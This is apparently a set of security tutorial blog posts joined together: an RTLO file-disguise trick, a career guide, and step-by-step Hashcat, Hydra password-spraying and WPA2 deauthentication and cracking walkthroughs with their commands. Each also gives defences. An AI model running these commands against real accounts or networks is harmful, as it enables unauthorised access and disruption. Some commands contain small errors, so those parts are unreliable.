Using Resource Hacker to change the icon | Credit: Mercury

A totally non-suspicious file | Credit: Mercury

Neat, isn’t it? Let’s look at how to avoid falling for this trick.

Mitigations

Online Security | Credit: [Wallpaperflare.com](http://wallpaperflare.com/" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; line-height: inherit; font-family: inherit; font-size: 17.6px; vertical-align: baseline; background-color: transparent; color: var(--gray90); text-decoration: underline; cursor: pointer; word-break: break-word;)

Since it abuses system features, almost any regular user or tech geek would fall for this hack. So how can you avoid it? Here are some tips:

Never open a file or link of unknown origin

Never underestimate the power of basic cyber hygiene. Don’t click random links, or open files that you have no clue where they came from or who sent them.

Set file extensions to be shown

A file name that hides its extension is much more easily noticed to be fishy when file extensions are on.

Be cautious if you notice that just before the extension, the file ends with common file extensions written backwards. For example, ‘infoexe.pdf’ will be obvious. However, some are less obvious like ‘infosbv.png' which could be a Visual Basic script (.vbs). A file named ‘Samsung_Galaxy_tab.png’ could be a batch file (.bat).

Install and keep Antivirus software up to date

In case you have fallen for such, this could be your last line of defense. An appropriate antivirus will take note if a script or executable file with malicious actions has been executed and will quarantine or delete it.

I mean, a $20 yearly subscription sounds better than over $200 down the drain for nothing 💀.

Apply best practices

For the more sophisticated IT people in organisations, implementation of best practices such as Network traffic analysis, firewalls, use of intrusion detection and prevention systems and network segmentation are your best bet.

Conclusion

Let’s summarise what you’ve learned:

1. How to use RTLO characters to manipulate text
2. How to change application icons using Resource Hacker
3. How to identify text manipulated with RTLO characters

Initially it’s hard to identify files modified like this. I encourage you to play around with different file names and extensions and see what you get. This will also train you to identify files that are not what they seem.

Remember, this is strictly for educational purposes. And with that, we have come to the end of this article. As I always say, Happy Hacking! 🙃

Resources

1. Other ways to change an app icon
2. More ways to use RTLO

Acknowledgements

Thanks to Anuoluwapo Victor, Chinaza Nwukwa, Holumidey Mercy, Favour Ojo, Georgina Awani, and my family for the inspiration, support and knowledge used to put this post together. You all inspire me daily.

Cover image credit: The Kelpies | Jamie McInall

Ethical hacking is also known as “white hat” hacking or pentesting. It is the practice of using hacking techniques and tools to test the security of a computer system.

The goal of an ethical hacker is to improve the security of the system. This involves identifying and addressing weaknesses that can be exploited by malicious hackers.

Ethical hacking involves simulating the types of attacks a malicious hacker might use. This helps us find the vulnerabilities in a system and apply fixes to prevent or reduce them.

Recent reports say that the demand for Cybersecurity engineers is at an all-time high. If you are thinking of a career in cybersecurity, this is a perfect time.

Whether you are new to the field or have some experience under your belt, this guide will help you get started on your ethical hacking journey. So let’s dive in!

Learn the Different Types of Cyber Attacks.

The first thing you have to do is understand the different types of attacks. This will help give you an idea about what you will be dealing with as a cybersecurity engineer.

Here are some common types of cyber attacks.

1. Malware attacks: These attacks involve the use of malicious software. This includes viruses or ransomware that lock the system and ask for payment. You might remember the Wannacry ransomware that ravaged businesses in 2017.

2. Phishing attacks: These attacks use fake emails, websites, and social media messages. This attack tricks users into giving out their private information like logins, credit card details, and so on.

3. Denial of service (DoS) attacks: These attacks try to crash a target system using too much traffic. A server can only handle a specific number of requests. If the server exceeds its capacity due to a DoS attack, it will become unavailable to other users.

4. SQL injection attacks: These attacks involve injecting malicious code into a database. This happens due to poor security practices in building a web application. If successful, hackers can take over and even destroy an entire database.

5. Cross-site scripting (XSS) attacks: These attacks involve injecting malicious code into a website. For example, if your website has a comments section without proper checks, malicious scripts can be injected into it. This script can then get saved into your database and also run on your customer’s browsers.

6. Password attacks: These attacks involve attempting to guess or crack passwords. There are many tools available like John the Ripper and Hashcat.

7. Wireless attacks: These attacks involve targeting wireless networks like cracking a company’s WiFi. Once a hacker gains access to the WiFi, they can listen to every computer that connects to that WiFi.

These are a few examples of the many types of cyber attacks that exist in today’s world. It is important that you understand different types of attacks and their impact. This will help you plan your training as well as choose a sub-category to specialize in.

Develop Your Skillset

Now that you know the different types of cyber attacks, how do you develop your skillset? Here are five steps that will help you move from beginner to professional.

Learn Linux Fundamentals

Most servers run on Linux operating systems. Though most users use Windows, Linux is still the dominant server operating system in use. From AWS to Azure, most cloud servers are also deployed using Linux.

You can opt-in for Linux certifications like the Red Hat Certification or Linux essentials. You can also play Wargames in OverTheWire to learn some practical Linux commands.

Also, here's a beginner-friendly course that teaches you the basics of Linux for ethical hacking.

Learn Networking Fundamentals

Learning networking is essential for cybersecurity. It helps you understand how computers talk to each other. Understanding protocols, architecture, and topology also help in building effective security measures against attackers.

A solid understanding of networking also helps with incident response and forensics. A strong networking background will get you from beginner to intermediate in a shorter time frame.

I would recommend this Youtube playlist from Neso Academy. They have done a great job in putting all the Networking concepts together.

Learn Basic Programming

There is no alternative to learning to code. Tools like ChatGPT only enhance the way you work, they don't do it for you. So you need some programming basics. Or you will run into the risk of remaining a Script Kiddie.

Programming knowledge helps you understand how computer systems work. Knowing programming also helps you to create secure software and systems. Programming skills are also needed to analyze and reverse-engineer malicious code. This is a crucial skillset for both offensive and defensive Pentesters.

Try these two resources:

• Learn basic Bash scripting

• Learn basic Python programming

TryHackme Pathways

TryHackMe is a platform that provides virtual rooms for learning cybersecurity skills. These rooms are interactive and they help you learn the method of finding and exploiting vulnerabilities. This is all done in a simulated network, so you will get some real-world practice without causing any damage.

They have also grouped rooms together to create pathways. These pathways help you to focus on a single topic, for example offensive security, defensive security, web app security, and so on.

Here are two pathways you can start with:

• Introduction to Cyber Security

• Junior Penetration Tester

Labs / Certifications / Community

Once you have completed the above steps, you can call yourself a mid-level ethical hacker. The next step is to get proficient by gaining some real-world hacking skills.

Here are the things you can do:

• Join HackTheBox and start cracking some virtual machines.

• Prepare for a certification like Pentest+ or OSCP

• Join a community like Stealth Security to keep learning about new tools and techniques.

By doing these steps and continuing to learn and practice, you can build a strong skillset. Do note that ethical hacking requires a strong foundation in Linux and networking, so don’t skip those steps.

Pentesting Tools to Learn

There are a few tools you should learn if you want to be an effective and skilled ethical hacker. These tools are industry-standard and will most likely be used in the company you are looking to get into. Let’s look at each one of them.

• Nmap: Nmap is a popular scanning and enumeration tool. Nmap helps us to find open ports, services, and vulnerabilities in a system. This is usually the first tool you will learn as an ethical hacker. You can read more about it here.

• Wireshark: Wireshark helps us to analyze networks. When you connect to a network, you can use Wireshark to see the packets of data in real-time. As an offensive tool, Wireshark also helps to perform man-in-the-middle attacks. You can read more about it here.

• Burpsuite: Burpsuite is an all-in-one web application auditing tool. Burpsuite helps us to debug issues in web apps, capture requests and responses, and even brute-force login attempts. Burpsuite is also popular among bug-bounty hunters.

• Metasploit: Once you have found a way to get into a system, Metasploit will help you generate the payload. Metasploit is a powerful tool that comes with a lot of scanners, payloads, and exploits. You can also import results from other tools like Nmap into Metasploit. You can read more about it here.

• Nessus: Nessus is an all-in-one scanner that helps us find vulnerabilities. It also provides recommendations on how to resolve those vulnerabilities. Nessus is a paid tool with a limited free option but is commonly used in enterprises.

I have also recently written a blog post on the top ten tools you need to know as an ethical hacker, so you can check it out if you are interested.

Conclusion

In conclusion, ethical hacking is a valuable and rewarding career choice. Given the gap in demand and available security engineers, this is the perfect time to start a cybersecurity career.

Just remember that ethical hacking requires a strong foundation in networking and Linux, so don’t skip those lessons before you start working with a pentesting tool.

Hope you enjoyed this article. You can find more about my articles and videos on my website.

Hashing is often confused with encryption. A simple difference is that hashed data is not reversible. Encrypted data can be reversed using a key. This is why applications like Telegram use encryption while passwords are hashed.

In this article, we will look at installing and working with Hashcat. Hashcat is a simple but powerful command line utility that helps us to – you guessed it – crack hashes.

We will first start by looking at how hashing works in detail.

Note: All my articles are for educational purposes. If you use this information illegally and get into trouble, I am not responsible. Always get permission from the owner before scanning / brute-forcing / exploiting a system.

What is Password Hashing?

Hashing is the process of converting an alphanumeric string into a fixed-size string by using a hash function. A hash function is a mathematical function that takes in the input string and generates another alphanumeric string.

How hashing works

There are many hashing algorithms like MD5, SHA1, and so on. To learn more about different hashing algorithms, you can read the article here.

The length of a hash is always a constant, irrespective of the length of the input. For example, if we use the MD5 algorithm and hash two strings like “Password123” and “HelloWorld1234”, the final hash will have a fixed length.

Here is the MD5 hash for “Password123”.

42f749ade7f9e195bf475f37a44cafcb

If we use the input string as “HelloWorld1234”, this will be the result:

850eaebd5c4bb931dbb2bbcf7994c021

Now there is a similar algorithm called encoding. A popular encoding algorithm is base64. Here is how the same “Password123” will look if we encode it with base64:

UGFzc3dvcmQxMjM=

So what is the difference between hashing and encoding? When we encode a string, it can be easily decoded to get the source string. But if we hash a string, we can never get to the source string (maybe with quantum computers, but that's another topic for discussion).

Hashing and encoding have different use cases. We can apply encoding to mask/simplify strings while hashing is used to secure sensitive data like passwords.

If hashes are not reversible, how would we compare the strings? Simple – we compare the hashes.

When we signup for a website, they will hash our password before saving it (hopefully!). When we try to log in again, the same hashing algorithm is used to generate a hash for our input. It is then compared with the original hash saved in the database.

This approach is also what gives rise to hashing attacks. A simple way to attack hashes is to have a list of common passwords hashed together. This list is called a Rainbow table. Interesting name for a table of hashes.

Now that we know how hashing works, let's look at what Hashcat is.

What is Hashcat?

Hashcat is a fast password recovery tool that helps break complex password hashes. It is a flexible and feature-rich tool that offers many ways of finding passwords from hashes.

Hashcat is also one of the few tools that can work with the GPU. While CPUs are great for sequential tasks, GPUs have powerful parallel processing capabilities. GPUs are used in Gaming, Artificial intelligence, and can also be used to speed up password cracking.

Here is the difference between a CPU and a GPU if you want to learn more.

Other notable features of Hashcat include:

• Fully open source.
• Support for more than 200 hashing algorithms.
• Support for Windows, Linux, and Mac.
• Support for cracking multiple hashes in parallel.
• Built-in benchmarking system.

Now that we know what Hashcat is, let's go and install it.

How to Install Hashcat

Hashcat comes pre-installed in Kali and Parrot OS. To install it in Ubuntu / Debian-based systems, use the following command:

$ apt install hashcat

To install it on a Mac, you can use Homebrew. Here is the command:

$ brew install hashcat

For other operating systems, a full list of installation instructions can be found here.

Once the installation is done, we can check Hashcat’s help menu using this command:

$ hashcat -h

Hashcat help menu

In addition to Hashcat, we will also need a wordlist. A word list is a list of commonly used terms. This can be a password wordlist, username wordlist, subdomain wordlist, and so on.

A popular password wordlist is rockyou.txt. It contains a list of commonly used passwords and is popular among pen testers. You can find the Rockyou wordlist under /usr/share/wordlists in Kali Linux.

How to Work with Hashcat

Now that we know what hashing and Hashcat are, let’s start cracking some passwords.

Before cracking a hash, let's create a couple of hashes to work with. We can use a site like Browserling to generate hashes for input strings.

Let’s create two hashes: A MD5 hash and a SHA1 hash for the string “Password123”. I'm using a weak password to help you understand how easy it is to crack these passwords.

Here are the generated hashes for the input strings.

MD5 hash -> 42f749ade7f9e195bf475f37a44cafcb
SHA1 hash -> b2e98ad6f6eb8508dd6a14cfa704bad7f05f6fb1

We can store these hashes under the names md5.txt and sha1.txt to use them when working with Hashcat.

To crack a password using Hashcat, here is the general syntax.

$ hashcat -m value -a value hashfile wordlist

Let’s dissect the syntax. We have used two flags, -m and -a . The -m flag is used to specify the hash type and the -a flag is to specify the attack mode. You can find the list of hash types and attack modes here.

Let’s crack our md5 hash first. We will crack this hash using the Dictionary mode. This is a simple attack where we provide a list of words (RockYou) from which Hashcat will generate and compare hashes.

We can specify the hash mode as “md5” using the value 0. But Hashcat can also identify the hash type automatically for common hash algorithms.

For the attack mode, we will be using the dictionary mode (0) using the flag -a. Here is the full command:

$ hashcat -m 0 -a 0 md5.txt rockyou.txt

Hashcat will quickly find the value for the hash, in this case, “Password123”:

Hashcat MD5 crack

Looks simple, doesn't it? Now let’s crack our SHA hash. The hash mode value for SHA1 is 100. Here is the command:

$ hashcat -m 100 -a 0 sha1.txt rockyou.txt

And here is the output from Hashcat:

Hashcat SHA1 crack

Hashcat supports almost all hashing algorithms with various attack modes. Let's look at a few attack modes and see how they work.

Dictionary attack (-a 0)

As we saw in our example above, a dictionary attack is performed by using a wordlist. A dictionary attack is also the default option in Hashcat. The better the wordlist is, the greater the chances of cracking the password.

Combinator attack (-a 1)

The combinator attack will try different combinations of words from our wordlist. For example, if our wordlist contains the words “pass”, ”123", and ”hello”, Hashcat will generate the following wordlist.

passpass
pass123
passhello
123pass
123123
123hello
hellopass
hello123
hellohello

As you can see, using a simple wordlist can give us a number of combinations. This attack is great if we know some terms that might be used in the password. Keep in mind that, the larger the initial wordlist, the more complicated the final wordlist gets.

Mask attack (-a 3)

The mask attack is similar to the dictionary attack, but it is more specific. Brute-force approaches like dictionary attacks can take a long time to crack a password. But if we have information regarding the password, we can use that to speed up the time it takes to crack the password.

For example, if we know the length of the password and a few characters that might be in the password, we can generate a custom wordlist with those characters.

The mask attack is out of scope for this article, but you can learn more about mask attacks here.

In addition to these common attack types, there are more attack modes in Hashcat. This includes Hybrid mode, Permutation attack, Rule-based attack, and so on. Each of these modes can be used for specific use cases and to speed up password cracking.

How to Defend Against Hashcat

The first and obvious step is to set strong passwords. The stronger the password is, the harder it is to crack it. You can check if your password has been exposed to the internet here.

A more effective way is to add salts to password hashes. A salt is an additional string added to the existing password so the hash generated is different from the normal hash of a string.

For example, if a string “sdf909” is added to a password “Password123”, Rainbow table attacks will immediately fail since they don't have hashes with the salt added to them.

To crack a salted password, the attacker should know both the hash and salt values. This makes it harder to crack hashes using methods such as Rainbow tables.

We can further strengthen salting by using dynamic salts instead of static salts. We can write a function that generates a salt value for every string making it exponentially harder to crack a salted password.

You can read this article to learn more about how Salts work in password hashing.

Summary

Hashing is the method of using a mathematical function to generate a random string. It is a one-way function and helps to secure data such as user passwords.

Hashcat is a powerful tool that helps to crack password hashes. Hashcat supports most hashing algorithms and can work with a variety of attack modes.

To enforce security and protect hashes from attacks, use strong passwords and salts before hashing passwords.

Loved this article? Join Stealth Security Weekly Newsletter and get articles delivered to your inbox every Friday. You can also connect with me on Linkedin.

Hydra can perform rapid dictionary attacks against more than 50 protocols. This includes telnet, FTP, HTTP, HTTPS, SMB, databases, and several other services.

Hydra was developed by the hacker group “The Hacker’s Choice”. Hydra was first released in 2000 as a proof of concept tool that demonstrated how you can perform attacks on network logon services.

Hydra is also a parallelized login cracker. This means you can have more than one connection in parallel. Unlike in sequential brute-forcing, this reduces the time required to crack a password.

In my last article, I explained another brute-force tool called John the Ripper. Though John and Hydra are brute-force tools, John works offline while Hydra works online.

In this article, we will look at how Hydra works followed by a few real-world use cases.

Note: All my articles are for educational purposes. If you use it illegally and get into trouble, I am not responsible. Always get permission from the owner before scanning / brute-forcing / exploiting a system.

How to Install Hydra

Hydra comes pre-installed with Kali Linux and Parrot OS. So if you are using one of them, you can start working with Hydra right away.

On Ubuntu, you can use the apt package manager to install it:

$ apt install hydra

In Mac, you can find Hydra under Homebrew:

$ brew install hydra

If you are using Windows, I would recommend using a virtual box and installing Linux. Personally, I don't recommend using Windows if you want to be a professional penetration tester.

How to Work with Hydra

Let’s look at how to work with Hydra. We will go through the common formats and options that Hydra provides for brute-forcing usernames and passwords. This includes single username/password attacks, password spraying, and dictionary attacks.

If you have installed Hydra, you can start with the help command like this:

$ hydra -h

This will give you the list of flags and options that you can use as a reference when working with Hydra.

Hydra help command

How to Perform a Single Username/Password Attack with Hydra

Let’s start with a simple attack. If we have the username and password that we expect a system to have, we can use Hydra to test it.

Here is the syntax:

$ hydra -l <username> -p <password> <server> <service>

Let’s assume we have a user named “molly” with a password of “butterfly” hosted at 10.10.137.76. Here is how we can use Hydra to test the credentials for SSH:

$ hydra -l molly -p butterfly 10.10.137.76 ssh

If it works, here is what the result will look like:

Hydra single username and password

How to Perform a Password Spraying Attack with Hydra

What if we know a password that someone is using, but we are not sure who it is? We can use a password spray attack to determine the username.

A password spray attack is where we use a single password and run it against a number of users. If someone is using the password, Hydra will find the match for us.

This attack assumes we know a list of users in the system. For this example, we will create a file called users.txt with the following users:

root
admin
user
molly
steve
richard

Now we are going to test who has the password “butterfly”. Here is how we can run a password spray attack using Hydra.

$ hydra -L users.txt -p butterfly 10.10.137.76 ssh

We will get a similar result to the following output if any of the users match with the given password. You should also notice that we have used the flag -L instead of -l. -l is for a single username and -L is for a list of usernames.

Hydra password spraying

How to Perform a Dictionary Attack with Hydra

Let’s look at how to perform a dictionary attack. In real-world scenarios, this is what we will be using Hydra regularly for.

A dictionary attack is where we have single/multiple usernames and we provide a password wordlist to Hydra. Hydra then tests all these passwords against every user in the list.

I am going to use the Rockyou wordlist for this example along with the users.txt file we created in the previous attack. If you are using Kali Linux, you can find the RockYou wordlist under /usr/share/wordlists/rockyou.txt.

Here is the command for a dictionary attack:

$ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 1010.137.76 ssh

If this attack is successful, we will see a similar result to the other two commands. Hydra will highlight the successful username/password combinations in green for all the matches.

How to Use the Verbosity and Debugging Flags in Hydra

Hydra can be awfully quiet when running large brute-force attacks. If we have to make sure Hydra is doing what it is expected to do, there are two flags we can use.

The verbosity (-v) flag will show us the login attempt for each username/password combination. This can be a bit much when there are a lot of combinations to go through, but if it is something you need, we can use the verbosity flag.

Here is a sample result. We can see that Hydra prints information about failed attempts in addition to the successful matches.

Hydra verbose mode

We can also use the debug (-d) flag to gather even more information. Here is the same result when using the debug flag:

Hydra debug mode

We can see that Hydra prints way more information than we need. We will only use debug mode rarely, but it is good to know that we have the option to watch every action Hydra takes when brute-forcing a service.

How to Save Your Results in Hydra

Let's look at how to save results. There is no point in spending hours cracking a password and losing it due to a system crash.

We can use the -o flag and specify a file name to save the result. Here is the syntax.

$ hydra -l <username> -p <password> <ip> <service> -o <file.txt>

More flags and formats

Hydra also offers a few additional flags and formats that will be useful for us as pen testers. Here are a few:

Service specification

Instead of specifying the service separately, we can use it with the IP address. For example, to brute force SSH, we can use the following command:

$ hydra -l <username> -p <password> ssh://<ip>

How to resume attacks

If Hydra’s session exits when an attack is in progress, we can resume the attack using the -R flag instead of starting from scratch.

$ hydra -R

How to use custom ports

Sometimes system administrators will change the default ports for service. For example, FTP can run in port 3000 instead of its default port 21. In those cases, we can specify ports using the -s flag.

$ hydra -l <username> -p <password> <ip> <service> -s <port>

How to attack multiple hosts

What if we have multiple hosts to attack? Easy, we can use the -M flag. The files.txt will contain a list of IP addresses or hosts instead of a single IP address.

$ hydra -l <username> -p <password> -M <host_file.txt> <service>

Targeted combinations

If we have a list of usernames and passwords, we can implement a dictionary attack. But if we have more information on which usernames are likely to have a set of passwords, we can prepare a custom list for Hydra.

For example, we can create a list of usernames and passwords separated by semicolons like the one below.

username1:password1
username2:password2
username3:password3

We can then use the -C flag to tell Hydra to run these specific combinations instead of looping through all the users and passwords. This drastically reduces the time taken to complete a brute-force attack.

Here is the syntax.

$ hydra -C <combinations.txt> <ip> <service>

We have seen how to work with Hydra in detail. Now you should be ready to perform real-world audits of network services like FTP, SSH, and Telnet.

But as a pen-tester, it is important to understand how to defend against these attacks. Remember, we are the good actors 😎.

How to Defend Against Hydra

The clear solution to help you defend against brute-force attacks is to set strong passwords. The stronger a password is, the harder it is to apply brute-force techniques.

We can also enforce password policies to change passwords every few weeks. Unfortunately, many individuals and businesses use the same passwords for years. This makes them easy targets for brute-force attacks.

Another way to prevent network-based brute-forcing is to limit authorization attempts. Brute-force attacks do not work if we lock accounts after a few failed login attempts. This is common in apps like Google and Facebook that lock your account if you fail a few login attempts.

Finally, tools like re-captcha can be a great way to prevent brute-force attacks. Automation tools like Hydra cannot solve captchas like a real human being.

Summary

Hydra is a fast and flexible network brute-forcing tool to attack services like SSH, and FTP. With a modular architecture and support for parallelization, Hydra can be extended to include new protocols and services easily.

Hydra is undoubtedly a powerful tool to have in your pen-testing toolkit.

Hope this article helped you to understand how Hydra works. If you have any questions, let me know in the comments.

You can connect with me or signup for the Stealth Security Newsletter. If you really enjoyed the article, you can buy me a coffee here.

In my previous article, we talked about some basic Linux skills and tricks. In this article you are going to learn a basic Wi-Fi hacking procedure using those skills.

You'll learn things such as how to:

1. Monitor Wi-Fi networks around you
2. Perform a DOS attack
3. Protect yourself against Wi-Fi attacks

Disclaimer: This is strictly for educational purposes only (and, of course, for a little fun). Do not under any circumstances, conditions, or influence of unwise friends use the hacks you learn here on organisations, individuals, or your probably annoying neighbour. You would be committing a crime and you'll either be fined, sent to jail, or just get your parents embarrassed.

And now that we have that lovely introduction out of the way, let’s proceed.🙃

What We'll Cover:

Here's a basic rundown of what this tutorial contains:

1. Introduction
2. What is a Packet?
3. How to Crack WPA2
   • Prerequisites
   • How to put the network card into monitor mode
   • How to look for the target
   • How to capture the handshake packets
   • How to perform a DOS attack
   • How to obtain the password (hopefully)
4. Mitigations Against WiFi Attacks
5. Conclusion

Introduction

A router ¦ Credit: Unsplash.com

Wireless Fidelity (Wi-Fi) is a common technology many of us use in our daily lives. Wether it's at school, home, or simply bingeing Netflix, it’s increasingly rare to see anyone carry out Internet related activities without it.

But have you ever tried to hack Wi-Fi? 🤔 (I’m sure you’ve been tempted 😏).

In order to hack something, you need to know how it works. This means you need to understand how the tech works in the first place. So let’s start from the basics: The Packet.

What is a Packet?

A Basic Packet. Credit: ResearchGate.com

A Packet is the basic unit/building block of data in a computer network. When data is transferred from one computer to another, it is broken down and sent in packets.

Think of packets like Lego building blocks. You (the computer) receive the complete set (the complete data) in pieces (packets) from the seller (another computer). You will then assemble the blocks together to build up the figure based on the instructions given in order to enjoy it (or in this case, for the whole data to make sense).

A packet, also known as a datagram, is made up of two basic parts:

1. A Header
2. The Payload/Data

The Header contains information about the packet. This helps the network and the receiving computer know what to do with it, such as the source and destination IP addresses.

The Payload is the main content the packet contains. It’s also worth mentioning that packets can be encrypted so that their data can't be read if gotten by an attacker.

In a network, packets are a requirement for packet switching. Packet switching means breaking down data into packets and sending them to various computers using different routes. When received, the computers can then assemble these packets to make sense of it all. The Internet is the largest known packet switching network on earth.

Now let's see how we can apply this knowledge to wireless networks.

How to Crack WPA2

A bunch of random code. Credit: Unsplash.com

Wi-Fi can use a number of various protocols to give you a secure internet connection. From the least to most secure, they are:

1. Open
2. WEP (Wired Equivalent Privacy)
3. WPA2 (Wi-Fi Protected Access 2)
4. WPA3 (Wi-Fi Protected Access 3)

An open network is pretty much as the name implies – open. It has no password and practically anyone can connect to it.

WEP is an old protocol, rarely in use and requires a password like its successors.

WPA2 is the most commonly used protocol around the world. WPA3 is a newest and the most secure protocol known till date. But it is rarely used and only available on newer devices.

Prerequisites

Wi-Fi works by constantly sending packets of data to your authenticated device. In order to hack it, you’ll need:

1. A Linux machine (Preferably Kali Linux)
2. A wireless adapter

To install Kali from scratch, you can follow this tutorial.

If you haven’t already, you’ll need to install a tool called Aircrack-ng on your machine. To install it, just type in the command below.

sudo apt install aircrack-ng

How to Put the Network Card into Monitor Mode

You first want to get information about the target. This is what hackers call reconnaissance.

In order to do that you need to first change your wireless card from ‘managed’ mode to ‘monitor’ mode. This will turn it from a mere network card to a wireless network reader.

First you need to find out the name of your wireless card. Plug in your adapter and run the iwconfig command to find out. It’s usually the last one on the list.

iwconfig. Credit: Daniel Iwugo

As you can see, mine is wlan1. Now run the following commands:

sudo airmon-ng check rfkillsudo
airmon-ng start <network interface>

sudo indicates the need for root privileges, check rfkill stops processes that could hinder the card from going into monitor mode, and start tells airmon-ng which network card to execute on. Replace the <network interface> with the name of your wireless card.

airmon-ng is a script that instantly changes your card to monitor mode. You actually can do this manually or make a script of your own but I personally prefer something rather simple.

How to Look for the Target

To see what networks are around you, run the following command:

sudo airodump-ng <network interface>

Airodump. Credit: Daniel Iwugo

airodump-ng is a part of the aircrack-ng suite that allows a network card to view the wireless traffic around it.

As you can see we get a lot of information. But let's take a quick look at the ESSID (Extended Service Set Identifier) column. Also known as the AP (Access Point) name, this column shows the name of the target network, which in my case will be ‘Asteroid’.

You want to concentrate on the target AP and ignore the rest. To do this, press Ctrl+C to cancel the current scan and this time, append the bssid of the network with the bssid flag as shown below.

sudo airodump-ng <network interface> --bssid <AP>

Airodump in action. Credit: Daniel Iwugo

The BSSID stands for Basic Service Set Identifier, a fancy name for the MAC address of the device. You use it to identify the device on a network, along with the ESSID (Name of the AP). Technically, you could just use the ESSID flag instead but different APs could have the same name. However, no two APs can ever have the same BSSID.

Below is a code snippet of what you would type to get info about the AP using the ESSID only.

sudo airodump-ng <network interface> --bssid <AP ESSID>

Note: If the name has a space, enclose it with quotes. For example, --bssid “Asteroid 1” .

You’ll notice I highlighted the MAC address of a client connected to the AP under the ‘Station’ column. To its left is the MAC address of the AP it is connected to.

How to Capture the Handshake Packets

The next step is to capture the handshake packets (Remember packets? 👀). Handshake packets are the first four packets sent from the AP when an authenticated device connects to an AP.

This means we have two options:

1. Wait for a device to connect to the AP
2. De-authenticate the device and then let it connect to the AP

The second one sounds a lot more fun so let’s go for it.

An LED keyboard. Credit: Unsplash.com

How to Perform a DOS Attack

You can use aireplay-ng or mdk4 to disconnect devices from APs for a time. This is called a de-authentication attack or a wireless DOS (Denial-Of-Service) attack.

Now here’s the game plan:

1. Setup airodump-ng to capture packets and save them
2. De-authenticate the device for some time while airodump-ng is running
3. Capture the handshake

Got all that? Good. Let’s roll. 👨‍💻👩‍💻

First, run the command to capture and save packets:

sudo airodump-ng -c <channel number> --bssid <AP BSSID> <network interface> -w <path for saved packets file>

Airodump capturing packets. Credit: Daniel Iwugo

Here, we're using the -c flag to specify the channel to search, the --bssid flag for the MAC address of the AP, and the -w flag to give a path you want to save the captured packets to.

Quick lesson: Channels reduce the chances of APs interfering with each other. When running airodump-ng, you can identify the channel number under the CH column.

While that is running, you’re going to run your de-authentication attack against the device connected to it using the command:

sudo aireplay-ng -a <BSSID of the AP> --deauth <time> <network interface>

The -a flag specifies the MAC address of the AP, --deauth specifies how long you want the attack to run in seconds, followed up by the network card.

A de-authentication attack involves using your own network card to send packets to interrupt communication between the AP and the client. It’s not perfect and sometimes the client may connect back, but only for a short time.

If your Wi-Fi is acting crazy and you seem to be disconnecting and connecting randomly back to it, you may be experiencing a de-authentication attack.

In the command above, you’re targeting the AP and running the attack. Note that you can instead attack any device connected to the AP and you should get the same result. All you need to do is to change the -a flag to the MAC address of any device connected.

While the DOS attack is underway, check on your airodump scan. You should see at the right top : WPA handshake: <mac address>. Once you have verified that, you can stop the replay attack and the airodump-ng scan.

Carrying out the replay attack to get the handshake. Credit: Daniel Iwugo

How to Obtain the Password (Hopefully)

In the final steps, you are going to run a bunch of generated Pairwise Master Keys (PMKs) against the captured packets to get the password. Let me break it down.

A PMK is basically an algorithmic combination of a word and the APs name. Our intention is to continuously generate PMKs using a wordlist against the handshake. If the PMK is valid, the word used to generate it is the password. If the PMK is not valid, it skips to the next word on the list.

I’m going to use the rockyou wordlist located in the /usr/share/wordlists directory. I think this is only found in Kali so if you have a different OS, you might make one of your own manually or generate one using crunch.

If it isn’t already extracted, just run the command:

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Quick history lesson: The rockyou wordlist is a bunch of passwords gotten from one of the most infamous cybersecurity data breaches that affected a company of the same name. It contains approximately 14 million unique passwords that were used in over 32 million accounts and as such, is one of the most dependable wordlists on the planet.

Now run the command:

sudo aircrack-ng <captured file with .cap> -w <path to wordlist>

Password cracking. Credit: Mercury

Alright, everyone – mission accomplished 😎.

The password was, well… ‘password’. Pretty disappointing from a security perspective, but I set this network up just for fun for the purposes of this tutorial. In reality, this could take minutes to hours depending on the length and strength of the password.

To clean up, simply remove the file captures, close your terminals, and run the command service NetworkManager restart to change your network card back to managed mode so you can connect to the Wi-Fi.

Mitigations Against WiFi Attacks

A basic personal workspace setup ¦ Credit: Wallpaperflare.com

Basic Wi-Fi security should cover this attack from a defensive perspective. Using WPA3 which is a newer protocol is your best bet against such an attack. To mitigate against de-authentication attacks, use an ethernet connection if possible.

Assuming that option is not on the table, you can use a strong passphrase (not a password) to minimise the attackers chances of getting it. A passphrase is a string of words simply used as a password. Passphrases tend to be longer than passwords, easier to remember, and are a rarer practice. Therefore, they will hardly be found in wordlists.

For example, ‘mercury’ is more likely to be found in a wordlist than ‘mercurylovespluto’. The later is a 15-character passphrase and as simple as it is, it would be hard for an attacker to find, guess, or generate.

Another mitigation would be to disable WPS (Wi-Fi Protected Setup) and avoid under any circumstance using a router that uses the WEP protocol. You’d just be asking for unwanted attention as it’s a lot easier to hack both of these than WPA2.

Conclusion

Let’s summarise what you’ve learned:

1. Change the wireless adaptor to monitor mode using airmon-ng
2. Scan for the target AP using airodump-ng and capture the packets
3. Perform a DOS attack on the AP to get the handshake packets
4. End the DOS once you have verified you captured the necessary packet
5. Use aircrack-ng to generate PMKs to run against the handshake packets

Sometimes, the password may not be in the wordlist. In that case, there are many other ways to get the password such as an Evil Twin Attack or variations of what you have learned here. I also encourage you to practice this and many other attacks you discover out there, as this helps make you a master hacker.

Remember, this is strictly for educational purposes. Only perform this on others with their consent, or on your own devices.

And with that, we have come to the end of this article. Hope you enjoyed it. And as I always say, Happy hacking! 🙃

Resources

1. A little more explanation on the handshake theory
2. More details on packets
3. WPA2 vs WPA3

Acknowledgements

Thanks to Anuoluwapo Victor, Chinaza Nwukwa, Holumidey Mercy, Favour Ojo, Georgina Awani, and my family for the inspiration, support and knowledge used to put this post together. You’re my unsung heroes.

Cover photo credit: Lego Gentlemen working on a router from Wallpaperflare.com

In this article, we will take a little tour of:

• The Linux operating system
• Package management
• The Linux file structure
• The Command Line Interface

And you get to learn how to update your Linux distro, too. Shall we? 🙃

What is Linux?

Hacker Penguins | Credit: Wallpaperflare.com

The Linux kernel was created by Linus Torvalds in 1991. What makes it an operating system are the additions to the kernel such as a package manager, desktop environment, a shell, and a bootloader, among other components.

Because Linux is open-source, there are many customisations that have been made to the operating system. Each specific combination of customisations is called a distribution or distro for short.

There are over hundreds, if not thousands of distros in the world. Each of them has been optimised for a specific purpose, or simply for fun by people just like you and me.

Some famous distros are:

1. Ubuntu (Most common)
2. Elementary OS (One of the most beautiful)
3. Debian (Neat and classy)
4. Arch Linux (For linux bosses)
